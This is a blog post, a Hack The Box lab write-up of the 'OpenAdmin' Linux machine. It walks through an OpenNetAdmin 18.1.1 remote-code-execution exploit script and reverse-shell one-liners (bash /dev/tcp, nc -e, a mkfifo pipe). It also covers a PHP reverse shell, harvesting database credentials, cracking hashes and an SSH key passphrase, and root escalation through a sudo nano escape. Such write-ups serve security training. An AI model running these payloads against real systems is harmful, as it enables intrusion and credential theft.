<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <link rel="stylesheet" type="text/css" href="/assets/css/print.css" media="print">
    <!--[if lt IE 9]>
    <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->

<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>HTB Writeup [Linux - Easy] - OpenAdmin (Intro to Dante Track #2) | OmniSl4sh’s Blog</title>
<meta name="generator" content="Jekyll v4.2.2" />
<meta property="og:title" content="HTB Writeup [Linux - Easy] - OpenAdmin (Intro to Dante Track #2)" />
<meta property="og:locale" content="en_US" />
<link rel="canonical" href="http://localhost:4000/2022/03/25/OpenAdmin.html" />
<meta property="og:url" content="http://localhost:4000/2022/03/25/OpenAdmin.html" />
<meta property="og:site_name" content="OmniSl4sh’s Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-03-25T00:00:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="HTB Writeup [Linux - Easy] - OpenAdmin (Intro to Dante Track #2)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-03-25T00:00:00+02:00","datePublished":"2022-03-25T00:00:00+02:00","headline":"HTB Writeup [Linux - Easy] - OpenAdmin (Intro to Dante Track #2)","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2022/03/25/OpenAdmin.html"},"url":"http://localhost:4000/2022/03/25/OpenAdmin.html"}</script>
<!-- End Jekyll SEO tag -->

    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->

  </head>

  <body>
    <div id="container">
      <div class="inner">
        <header>
          <h1><a href="http://localhost:4000/">OmniSl4sh's Blog</a></h1>
          <h2></h2>
        </header>
        <!--<<section id="downloads" class="clearfix">
          
  
        </section>
        hr>-->
        <section id="main_content">
          <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">HTB Writeup [Linux - Easy] - OpenAdmin (Intro to Dante Track #2)</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2022-03-25T00:00:00+02:00" itemprop="datePublished">Mar 25, 2022
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p><img src="/assets/OpenAdmin/OpenAdmin.png" alt="OpenAdmin" /></p>

<h3 id="summary">Summary</h3>
<ul>
  <li>A <strong>Linux machine</strong> with port 80 that reveals a <em>vulnerable web application</em>.</li>
  <li><em>Exploiting the application,</em> we gain access as <code class="language-plaintext highlighter-rouge">www-data</code>.</li>
  <li>We find <strong>credentials in the database configuration file</strong> which we use to <em>pivot to another user</em> which has access to a <em>special folder</em>.</li>
  <li><em>Browsing the special folder and checking listening ports,</em> we find an <strong>internal website being served on a high port</strong>.</li>
  <li><em>On the website,</em> logging in presents us with an <strong>SSH key of another user</strong> that we crack the passphrase for using <code class="language-plaintext highlighter-rouge">John</code>.</li>
  <li>The third user has <strong>sudo privileges</strong> with <code class="language-plaintext highlighter-rouge">nano</code> which we use to <strong>privesc</strong>.</li>
</ul>

<hr />

<h3 id="nmap">Nmap</h3>
<p>We start off with the usual nmap scan and we find two open ports:</p>
<ol>
  <li>SSH</li>
  <li>HTTP</li>
</ol>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>
<p><em>going to port 80,</em> we see the default apache2 web page:</p>

<p><img src="/assets/OpenAdmin/Apache-Default-Page.jpg" alt="Apache-Default-Page" /></p>

<h3 id="web-directory-bruteforcing">Web Directory Bruteforcing</h3>

<p><em>using the dirb <code class="language-plaintext highlighter-rouge">common.txt</code> wordlist with gobuster,</em> we find two directories:</p>
<ol>
  <li><code class="language-plaintext highlighter-rouge">/artwork</code></li>
  <li><code class="language-plaintext highlighter-rouge">/music</code></li>
</ol>

<p>we browse to them after opening up <code class="language-plaintext highlighter-rouge">burp</code> and proxying the traffic through it.</p>

<p>This is because burp would log all the traffic and will show us all the requests made by the website. This can show us a lot of hidden directories.</p>

<h3 id="finding-hidden-content">Finding hidden content</h3>

<p><em>after pressing <code class="language-plaintext highlighter-rouge">login</code> on the <code class="language-plaintext highlighter-rouge">music</code> directory web page,</em> we get redirected to <code class="language-plaintext highlighter-rouge">/ona</code></p>

<p><img src="/assets/OpenAdmin/music-login.jpg" alt="music-login" /></p>

<p><img src="/assets/OpenAdmin/ona-home.jpg" alt="ona-home" /></p>

<h3 id="version-based-exploit-search">Version-based Exploit Search</h3>

<p>we take note of the version <code class="language-plaintext highlighter-rouge">18.1.1</code> and search for exploits right away!</p>

<p><img src="/assets/OpenAdmin/ona-exploit.jpg" alt="ona-exploit" /></p>

<p>we look at the one from <strong>exploit-db</strong>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&amp;xajaxr=1574117726710&amp;xajaxargs[]=tooltips&amp;xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&amp;xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
</code></pre></div></div>

<h3 id="basic-exploit-analysis">Basic Exploit Analysis</h3>

<p><em>Analyzing the exploit,</em> it looks like a bash script given the shebang <code class="language-plaintext highlighter-rouge">#!/bin/bash</code>.</p>

<p>it takes a <code class="language-plaintext highlighter-rouge">url</code> as the argument and reads a command from the user to include it in the request.</p>

<p><em>since it doesn’t look malicious,</em> we run it and give it the url of the application <code class="language-plaintext highlighter-rouge">http://10.10.10.171/ona/</code> as an argument</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>exploit.sh http://10.10.10.171/ona/
</code></pre></div></div>

<p>and we get command execution!</p>

<p><img src="/assets/OpenAdmin/RCE.jpg" alt="RCE" /></p>

<h3 id="trying-to-get-a-real-shell">Trying to get a real shell</h3>

<p>we try to get a full-fledged shell using the standard reverse shell payloads:</p>
<ol>
  <li><code class="language-plaintext highlighter-rouge">bash -i &gt;&amp; /dev/tcp/&lt;LHOST&gt;/&lt;LPORT&gt; 0&gt;&amp;1</code></li>
  <li><code class="language-plaintext highlighter-rouge">nc -nv &lt;LHOST&gt; &lt;LPORT&gt; -e /bin/bash</code></li>
  <li><code class="language-plaintext highlighter-rouge">rm /tmp/pipe; mkfifo /tmp/pipe; /bin/sh -i &lt; /tmp/pipe 2&gt;&amp;1 | nc &lt;LHOST&gt; &lt;LPORT&gt; &gt; /tmp/pipe; rm /tmp/pipe</code></li>
</ol>

<p>but no dice :/</p>

<p>we decide to upload a <strong>php reverse shell</strong> instead using the one in <code class="language-plaintext highlighter-rouge">/usr/share/webshells</code></p>

<p><img src="/assets/OpenAdmin/upload-rev.jpg" alt="upload-rev" /></p>

<p>the reverse shell connects back when we visit <code class="language-plaintext highlighter-rouge">http://10.10.10.171/ona/revvy.php</code> and we’re good to go :D</p>

<p><img src="/assets/OpenAdmin/rev-connect-1.jpg" alt="rev-connect-1" /></p>

<p><img src="/assets/OpenAdmin/rev-connect-2.jpg" alt="rev-connect-2" /></p>

<h3 id="improving-our-shell">Improving our shell</h3>

<p>we then upgrade our shell to full tty as normal</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 <span class="nt">-c</span> <span class="s1">'import pty; pty.spawn("/bin/bash")'</span><span class="sb">`</span> <span class="o">&gt;</span> <span class="sb">`</span>CTRL + Z<span class="sb">`</span> <span class="o">&gt;</span> <span class="sb">`</span><span class="nb">stty </span>raw <span class="nt">-echo</span><span class="sb">`</span> <span class="o">&gt;</span> <span class="sb">`</span><span class="nb">fg</span><span class="sb">`</span> <span class="o">&gt;</span> <span class="sb">`</span><span class="nb">export </span><span class="nv">SHELL</span><span class="o">=</span>/bin/bash <span class="o">&amp;&amp;</span> <span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm-256color
</code></pre></div></div>

<h3 id="searching-for-custom-content">Searching for custom content</h3>

<p>we start by enumerating the web root and find a folder called <code class="language-plaintext highlighter-rouge">internal</code> owned by the user <code class="language-plaintext highlighter-rouge">jimmy</code> which we cannot access. This gets me to think that we probably would have to <strong>pivot to that user</strong> if we were to read the contents.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-4.4$ ls -la /var/www/
total 16
drwxr-xr-x  4 root     root     4096 Nov 22  2019 .
drwxr-xr-x 14 root     root     4096 Nov 21  2019 ..
drwxr-xr-x  6 www-data www-data 4096 Mar 19 11:31 html
drwxrwx---  2 jimmy    internal 4096 Mar 19 14:08 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21  2019 ona -&gt; /opt/ona/www
</code></pre></div></div>

<p><em>looking at the number of files inside the <code class="language-plaintext highlighter-rouge">ona</code> directory,</em> they turn out to be 1324 files :D
taking a look in every one of them is not feasable by any means. so we look for stuff that might contain something useful.</p>

<h3 id="creds-in-db-settings-config-file">Creds in DB settings config file</h3>

<p><em>after some considerable time,</em> we find the file <code class="language-plaintext highlighter-rouge">database_settings.inc.php</code> inside <code class="language-plaintext highlighter-rouge">/var/www/ona/local/config</code>. It contained the username and password for the database user:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>

<span class="nv">$ona_contexts</span><span class="o">=</span><span class="k">array</span> <span class="p">(</span>
  <span class="s1">'DEFAULT'</span> <span class="o">=&gt;</span> 
  <span class="k">array</span> <span class="p">(</span>
    <span class="s1">'databases'</span> <span class="o">=&gt;</span> 
    <span class="k">array</span> <span class="p">(</span>
      <span class="mi">0</span> <span class="o">=&gt;</span> 
      <span class="k">array</span> <span class="p">(</span>
        <span class="s1">'db_type'</span> <span class="o">=&gt;</span> <span class="s1">'mysqli'</span><span class="p">,</span>
        <span class="s1">'db_host'</span> <span class="o">=&gt;</span> <span class="s1">'localhost'</span><span class="p">,</span>
        <span class="s1">'db_login'</span> <span class="o">=&gt;</span> <span class="s1">'ona_sys'</span><span class="p">,</span>
        <span class="s1">'db_passwd'</span> <span class="o">=&gt;</span> <span class="s1">'n1nj4W4rri0R!'</span><span class="p">,</span>
        <span class="s1">'db_database'</span> <span class="o">=&gt;</span> <span class="s1">'ona_default'</span><span class="p">,</span>
        <span class="s1">'db_debug'</span> <span class="o">=&gt;</span> <span class="kc">false</span><span class="p">,</span>
      <span class="p">),</span>
    <span class="p">),</span>
    <span class="s1">'description'</span> <span class="o">=&gt;</span> <span class="s1">'Default data context'</span><span class="p">,</span>
    <span class="s1">'context_color'</span> <span class="o">=&gt;</span> <span class="s1">'#D3DBFF'</span><span class="p">,</span>
  <span class="p">),</span>
<span class="p">);</span>

<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>This looks promising :D
The <code class="language-plaintext highlighter-rouge">n1nj4W4rri0R!</code> password worked with the <code class="language-plaintext highlighter-rouge">ona_sys</code> and we start our enumerating the database.</p>

<h3 id="local-db-enumeration">Local DB Enumeration</h3>

<p>we find a table called <code class="language-plaintext highlighter-rouge">users</code> inside that contained both the username and password hashes of <code class="language-plaintext highlighter-rouge">admin</code> and <code class="language-plaintext highlighter-rouge">guest</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-4.4$ mysql -u ona_sys -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 48
Server version: 5.7.28-0ubuntu0.18.04.4 (Ubuntu)
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mysql&gt; show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ona_default        |
+--------------------+
2 rows in set (0.00 sec)
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mysql&gt; use ona_default;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mysql&gt; show tables;
+------------------------+
| Tables_in_ona_default  |
+------------------------+
| blocks                 |
| configuration_types    |
| configurations         |
| custom_attribute_types |
| custom_attributes      |
| dcm_module_list        |
| device_types           |
| devices                |
| dhcp_failover_groups   |
| dhcp_option_entries    |
| dhcp_options           |
| dhcp_pools             |
| dhcp_server_subnets    |
| dns                    |
| dns_server_domains     |
| dns_views              |
| domains                |
| group_assignments      |
| groups                 |
| host_roles             |
| hosts                  |
| interface_clusters     |
| interfaces             |
| locations              |
| manufacturers          |
| messages               |
| models                 |
| ona_logs               |
| permission_assignments |
| permissions            |
| roles                  |
| sequences              |
| sessions               |
| subnet_types           |
| subnets                |
| sys_config             |
| tags                   |
| users                  |
| vlan_campuses          |
| vlans                  |
+------------------------+
40 rows in set (0.00 sec)
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mysql&gt; select * from users;
+----+----------+----------------------------------+-------+---------------------+---------------------+
| id | username | password                         | level | ctime               | atime               |
+----+----------+----------------------------------+-------+---------------------+---------------------+
|  1 | guest    | 098f6bcd4621d373cade4e832627b4f6 |     0 | 2022-03-19 16:59:19 | 2022-03-19 16:59:19 |
|  2 | admin    | 21232f297a57a5a743894a0e4a801fc3 |     0 | 2007-10-30 03:00:17 | 2007-12-02 22:10:26 |
+----+----------+----------------------------------+-------+---------------------+---------------------+
2 rows in set (0.00 sec) 
</code></pre></div></div>

<p>the hashes appear to be <code class="language-plaintext highlighter-rouge">MD5</code> ones. and we crack them and find out:</p>
<ol>
  <li>user <code class="language-plaintext highlighter-rouge">admin</code> has a password of <code class="language-plaintext highlighter-rouge">admin</code></li>
  <li>user <code class="language-plaintext highlighter-rouge">guest</code> has a password of <code class="language-plaintext highlighter-rouge">test</code></li>
</ol>

<h3 id="the-usernames-and-passwords-we-have">The usernames and passwords we have</h3>

<p>we now have 3 passwords on our list:</p>
<ol>
  <li>n1nj4W4rri0R!</li>
  <li>admin</li>
  <li>test</li>
</ol>

<p><em>and from a quick <code class="language-plaintext highlighter-rouge">cat /etc/passwd | grep bash</code></em>, we know that our user list is:</p>
<ol>
  <li>jimmy</li>
  <li>joanna</li>
  <li>root</li>
</ol>

<p>we try those creds out and find that the password <code class="language-plaintext highlighter-rouge">n1nj4W4rri0R!</code> works for the <code class="language-plaintext highlighter-rouge">jimmy</code> user.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Mar 19 17:18:54 UTC 2022

  System load:  0.0               Processes:             176
  Usage of /:   31.0% of 7.81GB   Users logged in:       0
  Memory usage: 14%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

39 packages can be updated.
11 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Mar 19 11:39:02 2022 from 10.10.16.3
</code></pre></div></div>

<p>we start searching through his home folder. but we find nothing right away. so we turn towards that directory <code class="language-plaintext highlighter-rouge">/var/www/internal</code> to see what it looks like.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-bash-4.4$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 Mar 19 17:20 .
drwxr-xr-x 4 root  root     4096 Nov 22  2019 ..
-rwxrwxr-x 1 jimmy internal 3058 Mar 19 14:08 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23  2019 logout.php
-rwxrwxr-x 1 jimmy internal  339 Mar 19 13:54 main.php
</code></pre></div></div>

<h3 id="finding-unusual-files">Finding unusual files</h3>

<p>it contained those php files.</p>

<p><em>while browsing through the contents,</em> we find out that if the user managed to log in with the correct password on <code class="language-plaintext highlighter-rouge">index.php</code>, he would get redirected to <code class="language-plaintext highlighter-rouge">main.php</code> which pulls out the contents of <code class="language-plaintext highlighter-rouge">/home/joanna/.ssh/id_rsa</code> which is the ssh key for the <code class="language-plaintext highlighter-rouge">joanna</code> user.</p>

<p><code class="language-plaintext highlighter-rouge">index.php</code> contents:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;h2&gt;</span>Enter Username and Password<span class="nt">&lt;/h2&gt;</span>
<span class="nt">&lt;div</span> <span class="na">class = </span><span class="s">"container form-signin"</span><span class="nt">&gt;</span>
<span class="nt">&lt;h2</span> <span class="na">class=</span><span class="s">"featurette-heading"</span><span class="nt">&gt;</span>Login Restricted.<span class="nt">&lt;span</span> <span class="na">class=</span><span class="s">"text-muted"</span><span class="nt">&gt;&lt;/span&gt;&lt;/h2&gt;</span>
  <span class="cp">&lt;?php</span>
    <span class="nv">$msg</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'login'</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nb">empty</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nb">empty</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'password'</span><span class="p">]))</span> <span class="p">{</span>
      <span class="k">if</span> <span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'jimmy'</span> <span class="o">&amp;&amp;</span> <span class="nb">hash</span><span class="p">(</span><span class="s1">'sha512'</span><span class="p">,</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'password'</span><span class="p">])</span> <span class="o">==</span> <span class="s1">'00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1'</span><span class="p">)</span> <span class="p">{</span>
          <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'jimmy'</span><span class="p">;</span>
          <span class="nb">header</span><span class="p">(</span><span class="s2">"Location: /main.php"</span><span class="p">);</span>
      <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
          <span class="nv">$msg</span> <span class="o">=</span> <span class="s1">'Wrong username or password.'</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>
 <span class="cp">?&gt;</span>
<span class="nt">&lt;/div&gt;</span> <span class="c">&lt;!-- /container --&gt;</span>
</code></pre></div></div>

<p>main.php contents:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span> <span class="nb">session_start</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="k">isset</span> <span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]))</span> <span class="p">{</span> <span class="nb">header</span><span class="p">(</span><span class="s2">"Location: /index.php"</span><span class="p">);</span> <span class="p">};</span> 
<span class="c1"># Open Admin Trusted</span>
<span class="c1"># OpenAdmin</span>
<span class="nv">$output</span> <span class="o">=</span> <span class="nb">shell_exec</span><span class="p">(</span><span class="s1">'cat /home/joanna/.ssh/id_rsa'</span><span class="p">);</span>
<span class="k">echo</span> <span class="s2">"&lt;pre&gt;</span><span class="nv">$output</span><span class="s2">&lt;/pre&gt;"</span><span class="p">;</span>
<span class="cp">?&gt;</span>
<span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;h3&gt;</span>Don't forget your "ninja" password<span class="nt">&lt;/h3&gt;</span>
Click here to logout <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"logout.php"</span> <span class="na">tite = </span><span class="s">"Logout"</span><span class="nt">&gt;</span>Session
<span class="nt">&lt;/html&gt;</span>
</code></pre></div></div>

<p>getting the ssh key for the <code class="language-plaintext highlighter-rouge">joanna</code> user should be interesting. but we won’t be able to access those webpages unless they were in the <code class="language-plaintext highlighter-rouge">/var/www/html</code> directory and were both <strong>readable and executable</strong> by the <code class="language-plaintext highlighter-rouge">www-data</code> user. There has to be some other way…</p>

<h3 id="moving-along-other-privesc-paths-looking-for-information">Moving along other privesc paths looking for information</h3>

<p>I don’t get any ideas right off the bat. so I go ahead and use <code class="language-plaintext highlighter-rouge">linpeas.sh</code> to search for other ways to escalate my privileges.</p>

<p>we go down many different paths, including cracking the <code class="language-plaintext highlighter-rouge">sha512</code> hash inside the <code class="language-plaintext highlighter-rouge">index.php</code> file within the <code class="language-plaintext highlighter-rouge">internal</code> directory (the password was <code class="language-plaintext highlighter-rouge">Revealed</code>). and re-using it with all the users. but no dice :\</p>

<h3 id="finding-another-high-port-listening-locally">Finding another high port listening <em>locally</em></h3>

<p><em>but we do notice something we haven’t paid attention to the first time,</em> port <strong>52846</strong> is listening <em>internally</em>. <em>on our first look,</em> we were pre-occupied with the <code class="language-plaintext highlighter-rouge">mysql</code> port and missed that high one.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tcp    LISTEN   0        80              127.0.0.1:3306           0.0.0.0:*     
tcp    LISTEN   0        128             127.0.0.1:52846          0.0.0.0:*     
tcp    LISTEN   0        128         127.0.0.53%lo:53             0.0.0.0:*     
tcp    LISTEN   0        128               0.0.0.0:22             0.0.0.0:*     
tcp    LISTEN   0        128                     *:80                   *:*     
tcp    LISTEN   0        128                  [::]:22                [::]:* 
</code></pre></div></div>

<p>we know that we should get the contents of <code class="language-plaintext highlighter-rouge">joanna</code>’s ssh key if we log in with the correct username and password. and we happen to have those:</p>
<ul>
  <li>username: <code class="language-plaintext highlighter-rouge">jimmy</code></li>
  <li>password: <code class="language-plaintext highlighter-rouge">Revealed</code></li>
</ul>

<p><strong>And, if we didn’t,</strong> we had <code class="language-plaintext highlighter-rouge">write</code> access to the php authentication file and could modify it ;)</p>

<h3 id="ssh-tunneling-to-expose-the-internal-port">SSH Tunneling to expose the internal port</h3>

<p>so we create an <code class="language-plaintext highlighter-rouge">SSH tunnel</code> to bring out that internal <code class="language-plaintext highlighter-rouge">52846</code> port to our <code class="language-plaintext highlighter-rouge">localhost</code> on port <code class="language-plaintext highlighter-rouge">8888</code></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh jimmy@10.10.10.171 <span class="nt">-L</span> 8888:127.0.0.1:52846
</code></pre></div></div>

<p>and we see the login form:</p>

<p><img src="/assets/OpenAdmin/hidden-port.jpg" alt="hidden-port" /></p>

<h3 id="ssh-key-for-joanna">SSH Key for <code class="language-plaintext highlighter-rouge">Joanna</code></h3>

<p>after logging in, we get the ssh key for the <code class="language-plaintext highlighter-rouge">joanna</code> user!</p>

<p><img src="/assets/OpenAdmin/joanna-key.jpg" alt="joanna-key" /></p>

<p>we copy it to our kali machine and we change its permissions using <code class="language-plaintext highlighter-rouge">chmod 600 joanna_key</code></p>

<p>and we use it to log in. but it requires a passphrase :D</p>

<h3 id="cracking-the-ssh-passphrase-using-john">Cracking the SSH passphrase using <code class="language-plaintext highlighter-rouge">John</code></h3>

<p>we use the tool <code class="language-plaintext highlighter-rouge">ssh2john</code> to change the ssh key into a format that’s crackable by <code class="language-plaintext highlighter-rouge">john</code>. we crack the password using the <code class="language-plaintext highlighter-rouge">rockyou.txt</code> wordlist.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh2john joanna_key <span class="o">&gt;</span> joanna_john
john joanna_john <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt
</code></pre></div></div>

<p>the password turns out to be <code class="language-plaintext highlighter-rouge">bloodninjas</code></p>

<p>we use it and can successfully ssh in as the <code class="language-plaintext highlighter-rouge">joanna</code> user:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ssh -i joanna_key joanna@10.10.10.171
Enter passphrase for key 'joanna_key': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Mar 19 17:45:54 UTC 2022

  System load:  0.01              Processes:             169
  Usage of /:   30.9% of 7.81GB   Users logged in:       0
  Memory usage: 8%                IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

39 packages can be updated.
11 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Jul 27 06:12:07 2021 from 10.10.14.15
</code></pre></div></div>

<h3 id="joanna-can-root-the-box-sudo-style-d">Joanna can root the box. SUDO style :D</h3>

<p><em>after logging in,</em> we find no interesting files in her home directory. but she shows to have interesting permissions using <code class="language-plaintext highlighter-rouge">sudo -l -l</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Matching Defaults entries for joanna on openadmin:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User joanna may run the following commands on openadmin:

Sudoers entry:
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
        /bin/nano /opt/priv
</code></pre></div></div>

<p><strong>that’s it!</strong> we can now escalate privileges to root.
A quick search on GTFO bins (https://gtfobins.github.io) reveals a way we can do that using <code class="language-plaintext highlighter-rouge">CTRL+R</code> followed by <code class="language-plaintext highlighter-rouge">CTRL+X</code></p>

<p><img src="/assets/OpenAdmin/gtfo.jpg" alt="gtfo" /></p>

<p>we use the command <code class="language-plaintext highlighter-rouge">/bin/nano /opt/priv</code> and issue a command as root <code class="language-plaintext highlighter-rouge">chmod +s /bin/bash</code>. This makes the <code class="language-plaintext highlighter-rouge">bash</code> shell run with <code class="language-plaintext highlighter-rouge">setuid</code> bit. and makes us able to run as the <code class="language-plaintext highlighter-rouge">root</code> use when using <code class="language-plaintext highlighter-rouge">bash</code> with the <code class="language-plaintext highlighter-rouge">-p</code> flag. we do that and voala :D</p>

<p><img src="/assets/OpenAdmin/chmod-bash.jpg" alt="chmod-bash" /></p>

<p><img src="/assets/OpenAdmin/rooted.jpg" alt="rooted" /></p>

  </div><a class="u-url" href="/2022/03/25/OpenAdmin.html" hidden></a>
</article>

        </section>

        <footer>
        
          This page was generated by <a href="https://pages.github.com">GitHub Pages</a>.
        </footer>

      </div>
    </div>
  </body>
</html>